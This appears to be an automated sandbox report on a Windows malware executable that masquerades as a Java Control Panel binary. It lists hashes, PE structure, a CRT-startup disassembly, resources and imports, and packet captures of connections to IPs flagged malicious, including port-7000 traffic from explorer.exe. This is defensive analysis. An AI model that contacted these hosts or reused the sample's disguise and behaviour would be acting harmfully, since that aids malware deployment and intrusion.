http://images.outbrainimg.com/transform/v3/eyJpdSI6IjdkZGUzNDRkMmI2YjI4YjRhM2YzOWRiOTcyMzY5Y2EzNzJlY	taskhost.exe, 00000013.00000000.542810870.01BD0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	explorer.exe, 0000000C.00000002.752929952.00646000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	ASN	ASN Name	Malicious
23.49.13.33	United States	16625	unknown	true
162.244.225.30	United States	1423	CARSON-RTCA-CarsonCommunicationsLLCUS	true
209.126.124.166	United States	30083	unknown	false

Private

IP
127.0.0.1

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.853188857056287
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	zhAQkCQvME.exe
File size:	676352
MD5:	e7de0cc04f0a433fce5336b7c7504d2c
SHA1:	ff44818af235da435f601532acd29043b6a37ab0
SHA256:	e736cf964b998e582fd2c191a0c9865814b632a315435f80798dd2a239a5e5f5
SHA512:	43b273a7570d6f0a9dc328913e330a16ec64d1768736d93fee21824050a2f3feac5f64e99601543cf31d03e13784d0acb5ddec0bd063a3c870a4cb130cb54442
SSDEEP:	12288:/18kn+Q2MbyreC+7ZWCXBnqZADLQlz1GoUGUjZA2zopz9wiGLa9/8JQSaSZ:/oMbyrQ51qZZEoQjZAMt2187
File Content Preview:	MZ......................@...................................,...........!..L.!This program cannot be run in DOS mode....$............k}..k}..k}......k}......k}..6...k}......k}......k}......k}......k}......k}.15~..k}......k}..9...k}......k}......k}.....#k}

File Icon


Icon Hash:	8c8c80928292a60e

Static PE Info

General
Entrypoint:	0x40234e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	GUARD_CF, TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x5DA4F8D4 [Mon Oct 14 22:38:12 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	5e1df473304da895e634216143b56c18

Entrypoint Preview

Instruction
call 00007F7278B5AC7Dh
jmp 00007F7278B5A6D3h
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov eax, dword ptr [eax]
cmp dword ptr [eax], E06D7363h
jne 00007F7278B5A98Dh
cmp dword ptr [eax+10h], 03h
jne 00007F7278B5A987h
mov eax, dword ptr [eax+14h]
cmp eax, 19930520h
je 00007F7278B5A977h
cmp eax, 19930521h
je 00007F7278B5A970h
cmp eax, 19930522h
je 00007F7278B5A969h
cmp eax, 01994000h
jne 00007F7278B5A968h
call dword ptr [00406078h]
xor eax, eax
pop ebp
retn 0004h
push 00402358h
call dword ptr [00406034h]
xor eax, eax
ret
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
mov ecx, dword ptr [ebp+08h]
mov eax, 00005A4Dh
cmp word ptr [ecx], ax
je 00007F7278B5A966h
xor eax, eax
pop ebp
ret
mov eax, dword ptr [ecx+3Ch]
add eax, ecx
cmp dword ptr [eax], 00004550h
jne 00007F7278B5A951h
xor edx, edx
mov ecx, 0000010Bh
cmp word ptr [eax+18h], cx
sete dl
mov eax, edx
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
push ebx
push esi
movzx esi, word ptr [ecx+06h]
xor edx, edx
push edi
lea eax, dword ptr [eax+ecx+18h]
test esi, esi
jbe 00007F7278B5A97Dh
mov edi, dword ptr [ebp+0Ch]

Rich Headers

Programming Language:

[C++] VS2012 UPD1 build 51106
[ C ] VS2013 UPD2 build 30501
[ C ] VS2013 UPD5 build 40629
[ASM] VS2005 build 50727
[ASM] VS2015 UPD3 build 24213
[RES] VS2015 UPD2 build 23918
[C++] VS2013 UPD2 build 30501
[ASM] VS2012 UPD4 build 61030
[RES] VS2008 build 21022
[ASM] VS2010 SP1 build 40219
[IMP] VS2010 SP1 build 40219
[RES] VS2012 UPD4 build 61030
[EXP] VS2008 SP1 build 30729
[RES] VS2012 build 50727

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x4	0x3
IMAGE_DIRECTORY_ENTRY_IMPORT	0x62a4	0x8c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9e000	0xcdb0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x4
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa0	0x1c
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x6000	0xb0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x490c	0x4a00	False	0.627375422297	data	6.20789976151	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x6000	0xaa5	0x800	False	0.49072265625	data	4.63372863295	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_COMDAT, IMAGE_SCN_MEM_READ
.data	0x7000	0x5928	0x2c00	False	0.608487215909	data	6.93693441659	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
CODE	0xd000	0x90059	0x90200	False	0.999666291739	data	7.99951263317	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x9e000	0xcffa	0xce00	False	0.262439320388	data	3.80618140741	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x9ed90	0x2e8	data	English	United States
RT_ICON	0x9f078	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 1317570696, next used block 204	English	United States
RT_MENU	0x9f360	0x1c5c	data	English	United States
RT_MENU	0xa0fc0	0x154	data	English	United States
RT_DIALOG	0xa1118	0x260	data	English	United States
RT_DIALOG	0xa1378	0x1dc	data	English	United States
RT_DIALOG	0xa1558	0x1b8	data	English	United States
RT_DIALOG	0xa1710	0x244	data	English	United States
RT_DIALOG	0xa1958	0x154	data	English	United States
RT_DIALOG	0xa1ab0	0x164	data	English	United States
RT_DIALOG	0xa1c18	0x1fc	data	English	United States
RT_DIALOG	0xa1e18	0x1c8	data	English	United States
RT_DIALOG	0xa1fe0	0x144	data	English	United States
RT_DIALOG	0xa2128	0x160	data	English	United States
RT_DIALOG	0xa2288	0x1e4	data	English	United States
RT_DIALOG	0xa2470	0x180	data	English	United States
RT_DIALOG	0xa25f0	0x198	data	English	United States
RT_DIALOG	0xa2788	0x1b4	data	English	United States
RT_DIALOG	0xa2940	0x1d0	data	English	United States
RT_DIALOG	0xa2b10	0xfc	data	English	United States
RT_DIALOG	0xa2c10	0x134	data	English	United States
RT_DIALOG	0xa2d48	0x428	data	English	United States
RT_DIALOG	0xa3170	0x4be	data	English	United States
RT_DIALOG	0xa3630	0x1cc	data	English	United States
RT_DIALOG	0xa3800	0x5ee	data	English	United States
RT_DIALOG	0xa3df0	0x56c	data	English	United States
RT_DIALOG	0xa4360	0x1a4	data	English	United States
RT_DIALOG	0xa4508	0x220	data	English	United States
RT_DIALOG	0xa4728	0x680	data	English	United States
RT_DIALOG	0xa4da8	0x11c	data	English	United States
RT_DIALOG	0xa4ec8	0x148	data	English	United States
RT_DIALOG	0xa5010	0x148	data	English	United States
RT_STRING	0xa5158	0x2da	data	English	United States
RT_STRING	0xa5438	0x176	data	English	United States
RT_STRING	0xa55b0	0x42	data	English	United States
RT_STRING	0xa55f8	0xfc	data	English	United States
RT_STRING	0xa56f8	0x5c	data	English	United States
RT_STRING	0xa5758	0x76	data	English	United States
RT_STRING	0xa57d0	0xad2	data	English	United States
RT_STRING	0xa62a8	0x6c0	data	English	United States
RT_STRING	0xa6968	0x542	data	English	United States
RT_STRING	0xa6eb0	0x84a	data	English	United States
RT_STRING	0xa7700	0x200	data	English	United States
RT_STRING	0xa7900	0x45a	data	English	United States
RT_STRING	0xa7d60	0x400	data	English	United States
RT_STRING	0xa8160	0x42a	data	English	United States
RT_STRING	0xa8590	0x4b0	data	English	United States
RT_STRING	0xa8a40	0x6c	data	English	United States
RT_STRING	0xa8ab0	0x60	AmigaOS bitmap font	English	United States
RT_STRING	0xa8b10	0xfc	data	English	United States
RT_STRING	0xa8c10	0x198	data	English	United States
RT_STRING	0xa8da8	0xb2	data	English	United States
RT_STRING	0xa8e60	0x342	data	English	United States
RT_STRING	0xa91a8	0x22e	data	English	United States
RT_STRING	0xa93d8	0x1c0	data	English	United States
RT_STRING	0xa9598	0x198	data	English	United States
RT_STRING	0xa9730	0x1c0	data	English	United States
RT_STRING	0xa98f0	0x1be	AmigaOS bitmap font	English	United States
RT_STRING	0xa9ab0	0x1be	data	English	United States
RT_STRING	0xa9c70	0x268	data	English	United States
RT_STRING	0xa9ed8	0x1cc	data	English	United States
RT_STRING	0xaa0a8	0x100	data	English	United States
RT_ACCELERATOR	0xaa1a8	0x4c0	data	English	United States
RT_ACCELERATOR	0xaa668	0x20	data	English	United States
RT_GROUP_ICON	0xaa688	0x14	data	English	United States
RT_GROUP_ICON	0xaa6a0	0x14	data	English	United States
RT_VERSION	0xaa6b8	0x378	data	English	United States
RT_MANIFEST	0xaaa30	0x37b	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
MSACM32.dll	acmDriverID
msvcrt.dll	__p__fmode, _onexit, _lock, __dllonexit, _unlock, _controlfp, _except_handler4_common, ?terminate@@YAXXZ, __set_app_type, __getmainargs, __p__commode, __setusermatherr, _amsg_exit, _initterm, exit, _XcptFilter, _exit, _cexit
ole32.dll	CreateStreamOnHGlobal
KERNEL32.dll	GetModuleHandleA, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter, SetUnhandledExceptionFilter, InterlockedCompareExchange, Sleep, InterlockedExchange, DeleteCriticalSection, GetLastError, IsValidLanguageGroup
ADVAPI32.dll	OpenThreadToken
GDI32.dll	FlattenPath

Version Infos

Description	Data
LegalCopyright	Copyright 2004
InternalName	Java(TM) Control Panel
FileVersion	5.0.60.5
Full Version	7.8.7.7
CompanyName	Sun Microsystems, Inc.
ProductName	Java(TM) 2 Platform Standard Edition 5.0 Urdate 6
ProductVersion	7.8.7.7
FileDescription	Java(TM) Control Panel
OriginalFilename	rjrwer.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 13, 2019 19:28:42.624562025 CET	49158	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:28:42.626492023 CET	49159	80	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:42.770479918 CET	80	49159	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:42.770936012 CET	49159	80	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:42.794912100 CET	443	49158	162.244.225.30	192.168.1.107
Nov 13, 2019 19:28:42.796547890 CET	49158	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:28:42.806310892 CET	49159	80	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:42.875567913 CET	49158	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:28:42.951075077 CET	80	49159	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:42.951359987 CET	80	49159	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:42.951508999 CET	49159	80	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:42.961119890 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:43.046484947 CET	443	49158	162.244.225.30	192.168.1.107
Nov 13, 2019 19:28:43.046669960 CET	49158	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:28:43.097728014 CET	49158	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:28:43.105570078 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:43.105843067 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:43.108867884 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:43.254031897 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:43.254745960 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:43.254879951 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:43.254910946 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:43.254951954 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:43.255145073 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:43.255285025 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:43.255436897 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:43.264657974 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:43.264863968 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:43.265147924 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:43.265316010 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:43.281600952 CET	443	49158	162.244.225.30	192.168.1.107
Nov 13, 2019 19:28:43.281770945 CET	49158	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:28:43.307698011 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:43.452955008 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:43.453205109 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:45.954377890 CET	80	49159	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:45.954531908 CET	49159	80	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:46.256136894 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:46.415179968 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.415218115 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.415240049 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.415268898 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.415330887 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.415422916 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.415436983 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:46.415452003 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.415473938 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.415553093 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.415574074 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.415664911 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:46.448227882 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:46.559580088 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.559607029 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.559648037 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.559684038 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.559736013 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.559770107 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.559773922 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:46.559799910 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.559850931 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.559998035 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:46.560097933 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.560139894 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.560234070 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:46.560255051 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.560276985 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.560291052 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.560318947 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.560353994 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:46.560417891 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:46.634526968 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:46.646748066 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:47.018258095 CET	49161	7000	192.168.1.107	23.49.13.33
Nov 13, 2019 19:28:49.563240051 CET	443	49160	209.126.124.166	192.168.1.107
Nov 13, 2019 19:28:49.563359976 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:28:50.026355982 CET	49161	7000	192.168.1.107	23.49.13.33
Nov 13, 2019 19:28:56.026453018 CET	49161	7000	192.168.1.107	23.49.13.33
Nov 13, 2019 19:28:58.841746092 CET	49158	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:28:59.210062981 CET	443	49158	162.244.225.30	192.168.1.107
Nov 13, 2019 19:28:59.308619022 CET	443	49158	162.244.225.30	192.168.1.107
Nov 13, 2019 19:28:59.308957100 CET	49158	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:28:59.318762064 CET	49162	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:28:59.475634098 CET	443	49162	162.244.225.30	192.168.1.107
Nov 13, 2019 19:28:59.475799084 CET	49162	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:28:59.477355003 CET	49162	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:28:59.633157969 CET	443	49162	162.244.225.30	192.168.1.107
Nov 13, 2019 19:28:59.633220911 CET	49162	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:28:59.633922100 CET	49162	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:28:59.900111914 CET	49162	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:28:59.900342941 CET	49162	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:28:59.987313032 CET	443	49162	162.244.225.30	192.168.1.107
Nov 13, 2019 19:29:00.056915998 CET	443	49162	162.244.225.30	192.168.1.107
Nov 13, 2019 19:29:00.057086945 CET	49162	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:29:00.213268042 CET	443	49162	162.244.225.30	192.168.1.107
Nov 13, 2019 19:29:00.632309914 CET	443	49162	162.244.225.30	192.168.1.107
Nov 13, 2019 19:29:00.632488966 CET	49162	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:29:00.665554047 CET	49158	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:29:00.669272900 CET	49163	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:29:00.827689886 CET	443	49163	162.244.225.30	192.168.1.107
Nov 13, 2019 19:29:00.828440905 CET	49163	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:29:00.830498934 CET	49163	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:29:00.838584900 CET	443	49158	162.244.225.30	192.168.1.107
Nov 13, 2019 19:29:00.838615894 CET	443	49158	162.244.225.30	192.168.1.107
Nov 13, 2019 19:29:00.838638067 CET	443	49158	162.244.225.30	192.168.1.107
Nov 13, 2019 19:29:00.840482950 CET	49158	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:29:00.840548038 CET	49158	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:29:01.004271984 CET	443	49163	162.244.225.30	192.168.1.107
Nov 13, 2019 19:29:01.004460096 CET	49163	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:29:01.005711079 CET	49163	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:29:01.373788118 CET	49163	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:29:01.378357887 CET	443	49163	162.244.225.30	192.168.1.107
Nov 13, 2019 19:29:01.737212896 CET	443	49163	162.244.225.30	192.168.1.107
Nov 13, 2019 19:29:01.833918095 CET	443	49163	162.244.225.30	192.168.1.107
Nov 13, 2019 19:29:01.834053040 CET	49163	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:29:30.751434088 CET	443	49162	162.244.225.30	192.168.1.107
Nov 13, 2019 19:29:30.751468897 CET	443	49162	162.244.225.30	192.168.1.107
Nov 13, 2019 19:29:30.751566887 CET	49162	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:29:31.838704109 CET	443	49163	162.244.225.30	192.168.1.107
Nov 13, 2019 19:29:31.838741064 CET	443	49163	162.244.225.30	192.168.1.107
Nov 13, 2019 19:29:31.838890076 CET	49163	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:29:35.582350016 CET	49162	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:29:35.583807945 CET	49162	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:29:35.754169941 CET	443	49162	162.244.225.30	192.168.1.107
Nov 13, 2019 19:29:35.754298925 CET	49162	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:29:35.869213104 CET	49164	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:29:36.036416054 CET	443	49164	162.244.225.30	192.168.1.107
Nov 13, 2019 19:29:36.036578894 CET	49164	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:29:43.635901928 CET	49164	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:29:43.792982101 CET	443	49164	162.244.225.30	192.168.1.107
Nov 13, 2019 19:29:43.793158054 CET	49164	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:29:50.418800116 CET	49164	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:29:50.781721115 CET	443	49164	162.244.225.30	192.168.1.107
Nov 13, 2019 19:30:15.245270014 CET	49165	7000	192.168.1.107	23.49.13.33
Nov 13, 2019 19:30:18.245536089 CET	49165	7000	192.168.1.107	23.49.13.33
Nov 13, 2019 19:30:20.374777079 CET	443	49164	162.244.225.30	192.168.1.107
Nov 13, 2019 19:30:20.374811888 CET	443	49164	162.244.225.30	192.168.1.107
Nov 13, 2019 19:30:20.375180006 CET	49164	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:30:24.260863066 CET	49165	7000	192.168.1.107	23.49.13.33
Nov 13, 2019 19:30:34.072216988 CET	49164	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:30:34.072432041 CET	49164	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:30:34.074356079 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:30:34.074486971 CET	49159	80	192.168.1.107	209.126.124.166
Nov 13, 2019 19:30:34.076313019 CET	49166	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:30:34.229058027 CET	443	49164	162.244.225.30	192.168.1.107
Nov 13, 2019 19:30:34.229368925 CET	443	49164	162.244.225.30	192.168.1.107
Nov 13, 2019 19:30:34.231313944 CET	443	49166	162.244.225.30	192.168.1.107
Nov 13, 2019 19:30:34.231434107 CET	49166	443	192.168.1.107	162.244.225.30
Nov 13, 2019 19:30:34.495193958 CET	49159	80	192.168.1.107	209.126.124.166
Nov 13, 2019 19:30:34.692689896 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:30:35.245215893 CET	49159	80	192.168.1.107	209.126.124.166
Nov 13, 2019 19:30:35.464284897 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:30:36.304990053 CET	49167	7000	192.168.1.107	23.49.13.33
Nov 13, 2019 19:30:36.792114973 CET	49159	80	192.168.1.107	209.126.124.166
Nov 13, 2019 19:30:36.885718107 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:30:39.354396105 CET	49167	7000	192.168.1.107	23.49.13.33
Nov 13, 2019 19:30:39.729300976 CET	49160	443	192.168.1.107	209.126.124.166
Nov 13, 2019 19:30:39.755330086 CET	49159	80	192.168.1.107	209.126.124.166

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 13, 2019 19:28:42.550585985 CET	57663	53	192.168.1.107	8.8.8.8
Nov 13, 2019 19:28:42.576579094 CET	53	57663	8.8.8.8	192.168.1.107
Nov 13, 2019 19:28:46.532025099 CET	54024	53	192.168.1.107	8.8.8.8
Nov 13, 2019 19:28:46.567949057 CET	53	54024	8.8.8.8	192.168.1.107
Nov 13, 2019 19:28:46.681453943 CET	59734	53	192.168.1.107	8.8.8.8
Nov 13, 2019 19:28:46.708089113 CET	53	59734	8.8.8.8	192.168.1.107
Nov 13, 2019 19:28:47.526586056 CET	54024	53	192.168.1.107	8.8.8.8
Nov 13, 2019 19:28:47.562509060 CET	53	54024	8.8.8.8	192.168.1.107
Nov 13, 2019 19:28:48.526597977 CET	54024	53	192.168.1.107	8.8.8.8
Nov 13, 2019 19:28:48.562614918 CET	53	54024	8.8.8.8	192.168.1.107
Nov 13, 2019 19:28:50.526807070 CET	54024	53	192.168.1.107	8.8.8.8
Nov 13, 2019 19:28:50.563119888 CET	53	54024	8.8.8.8	192.168.1.107
Nov 13, 2019 19:28:54.526880026 CET	54024	53	192.168.1.107	8.8.8.8
Nov 13, 2019 19:28:54.563188076 CET	53	54024	8.8.8.8	192.168.1.107
Nov 13, 2019 19:30:15.654793024 CET	59306	53	192.168.1.107	8.8.8.8
Nov 13, 2019 19:30:15.690959930 CET	53	59306	8.8.8.8	192.168.1.107
Nov 13, 2019 19:30:16.652389050 CET	59306	53	192.168.1.107	8.8.8.8
Nov 13, 2019 19:30:16.688600063 CET	53	59306	8.8.8.8	192.168.1.107
Nov 13, 2019 19:30:17.652887106 CET	59306	53	192.168.1.107	8.8.8.8
Nov 13, 2019 19:30:17.688945055 CET	53	59306	8.8.8.8	192.168.1.107
Nov 13, 2019 19:30:34.038424969 CET	59306	53	192.168.1.107	8.8.8.8
Nov 13, 2019 19:30:34.074563980 CET	53	59306	8.8.8.8	192.168.1.107
Nov 13, 2019 19:30:38.026937962 CET	59306	53	192.168.1.107	8.8.8.8
Nov 13, 2019 19:30:38.063720942 CET	53	59306	8.8.8.8	192.168.1.107

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 13, 2019 19:28:42.550585985 CET	192.168.1.107	8.8.8.8	0xe53	Standard query (0)	www.ip-adress.com	A (IP address)	IN (0x0001)
Nov 13, 2019 19:28:46.681453943 CET	192.168.1.107	8.8.8.8	0x8df9	Standard query (0)	164.136.132.91.in-addr.arpa	PTR (Pointer record)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 13, 2019 19:28:42.576579094 CET	8.8.8.8	192.168.1.107	0xe53	No error (0)	www.ip-adress.com		209.126.124.166	A (IP address)	IN (0x0001)
Nov 13, 2019 19:28:42.576579094 CET	8.8.8.8	192.168.1.107	0xe53	No error (0)	www.ip-adress.com		85.93.88.251	A (IP address)	IN (0x0001)
Nov 13, 2019 19:28:42.576579094 CET	8.8.8.8	192.168.1.107	0xe53	No error (0)	www.ip-adress.com		85.93.89.6	A (IP address)	IN (0x0001)
Nov 13, 2019 19:28:42.576579094 CET	8.8.8.8	192.168.1.107	0xe53	No error (0)	www.ip-adress.com		207.38.89.115	A (IP address)	IN (0x0001)
Nov 13, 2019 19:28:46.708089113 CET	8.8.8.8	192.168.1.107	0x8df9	Name error (3)	164.136.132.91.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)

HTTP Request Dependency Graph

www.ip-adress.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.1.107	49159	209.126.124.166	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
